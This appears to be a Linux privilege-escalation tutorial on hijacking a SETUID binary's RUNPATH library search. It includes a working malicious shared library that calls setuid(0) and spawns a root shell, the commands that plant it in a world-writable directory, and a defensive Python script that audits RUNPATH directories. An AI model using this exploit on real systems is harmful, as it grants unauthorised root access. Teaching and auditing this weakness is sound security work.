Programs and binaries under development usually have custom libraries associated with them. Consider the following SETUID binary.
ls -la payroll
-rwsr-xr-x 1 root root 16728 Sep 1 22:05 payroll

We can use ldd to print the shared objects required by a binary or shared object. For each of a program's dependencies, ldd displays the location of the object and the hexadecimal address at which it is loaded into memory.
ldd payroll
linux-vdso.so.1 => (0x00007ffcb3133000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)

We see a non-standard library named libshared.so listed as a dependency of the binary. As stated earlier, it is possible to load shared libraries from custom locations. One such setting is the RUNPATH entry embedded in the binary: the directories it lists are searched before the standard library directories. It can be inspected with the readelf utility.

readelf -d payroll | grep PATH

The configuration allows libraries to be loaded from the /development folder, which is writable by all users. This misconfiguration can be exploited by placing a malicious library in /development, which takes precedence over the other directories because the RUNPATH entry is checked first (before the directories listed in the loader's configuration files).
ldd payroll
linux-vdso.so.1 (0x00007ffd22bbc000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)

cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
./payroll
./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery

Copying libc into place confirms that the binary loads whatever sits at /development/libshared.so, but it fails because the replacement does not export the dbquery symbol the binary expects. A library that defines that symbol is compiled instead (saved as src.c):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Exported under the name the payroll binary looks up, so the loader resolves the symbol here.
void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
}

gcc src.c -fPIC -shared -o /development/libshared.so
./payroll

The same approach applies to other kinds of shared objects that applications load dynamically, such as Apache modules loaded through the LoadModule directive: compile your own .so file and have the application load it to execute commands with its elevated privileges.
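A defender's counterpart to the readelf check above, added here as an example and not part of the original write-up: it parses the RPATH/RUNPATH entries from readelf -d output and flags any search directory that users other than the owner can write to, which is the condition the payroll example depends on. The sample readelf output is constructed, and audit() assumes readelf is on PATH.

```python
from __future__ import annotations
import os
import re
import stat
import subprocess

# Matches the readelf -d lines that carry the embedded search path, e.g.
#  0x000000000000001d (RUNPATH)  Library runpath: [/development:/opt/lib]
SEARCH_PATH_RE = re.compile(r"\((?:RPATH|RUNPATH)\)\s+Library r(?:un)?path: \[([^\]]*)\]")

# Constructed sample of readelf -d output for a binary like the payroll example.
SAMPLE_READELF = (
    "Dynamic section at offset 0x2de8 contains 27 entries:\n"
    " 0x0000000000000001 (NEEDED)  Shared library: [libshared.so]\n"
    " 0x000000000000001d (RUNPATH) Library runpath: [/development:/opt/lib]\n"
)

def parse_search_dirs(readelf_output: str) -> list[str]:
    """Return the RPATH/RUNPATH directories in readelf -d output, in search order."""
    dirs: list[str] = []
    for line in readelf_output.splitlines():
        match = SEARCH_PATH_RE.search(line)
        if match:
            dirs.extend(d for d in match.group(1).split(":") if d)
    return dirs

def classify_mode(mode: int) -> str:
    """Classify a directory mode: anyone but the owner able to write there can plant a library."""
    if mode & stat.S_IWOTH:
        return "world-writable"
    if mode & stat.S_IWGRP:
        return "group-writable"
    return "ok"

def audit(binary: str) -> list[tuple[str, str]]:
    """Run readelf on the binary and return (directory, verdict) pairs for each search entry."""
    out = subprocess.run(["readelf", "-d", binary], capture_output=True, text=True, check=True).stdout
    findings = []
    for d in parse_search_dirs(out):
        if "$ORIGIN" in d:          # relative to the binary's own directory; review by hand
            findings.append((d, "unexpanded"))
        elif not os.path.isdir(d):  # missing: dangerous if an unprivileged user can create it
            findings.append((d, "missing"))
        else:
            findings.append((d, classify_mode(os.stat(d).st_mode)))
    return findings
```

Running audit("/path/to/payroll") on the affected host would report /development as world-writable, which is the finding to remediate (tighten the directory permissions or drop the RUNPATH entry).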